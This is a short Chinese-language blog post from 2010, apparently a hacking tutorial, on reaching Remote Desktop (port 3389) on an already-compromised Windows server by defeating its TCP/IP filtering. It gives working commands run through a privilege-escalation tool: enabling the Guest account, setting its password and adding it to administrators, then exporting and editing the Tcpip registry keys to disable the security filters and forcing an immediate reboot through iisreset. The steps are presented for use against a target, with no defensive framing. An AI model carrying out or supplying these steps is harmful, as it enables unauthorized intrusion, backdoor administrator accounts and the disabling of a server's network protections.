MENU

突破TCP/IP筛选到3389终端登陆

June 27, 2010 • 技术随笔

0x01 成功提升权限建立用户

激活Guest用户

D:\exp.exe "net user guest /active:yes" 
D:\exp.exe "net user guest test123"
D:\exp.exe "net localgroup administrators guest /add" 

0x02 解决TCP/IP筛选

突破TCP/IP筛选我们可以更改他的注册表来实现,需要做的就是导出他注册表的三处,更改后再导入就可以了。

D:\exp.exe "regedit -e D:\1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/Tcpip" #导出注册表里关于TCP/IP筛选的第一处

D:\exp.exe "regedit -e D:\2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip" #导出注册表里关于TCP/IP筛选的第二处

D:\exp.exe "regedit -e D:\3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip" #导出注册表里关于TCP/IP筛选的第三处

然后把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下,找到如下地方:

"EnableSecurityFilters"=dword:00000001

修改成

"EnableSecurityFilters"=dword:00000000

修改完成后再将三个文件导回目标机器

regedit -s D:\1.reg
regedit -s D:\2.reg
regedit -s D:\3.reg

0x03 最后一步

重新启动目标机器后在能解决TCP/IP筛选问题

D:\exp.exe "iisreset /reboot /timeout:00" #利用他自身的iis服务来重新启动他的机器,/timeout:00这个参数是让他立即重新启动
Archives QR Code
QR Code for this page
Tipping QR Code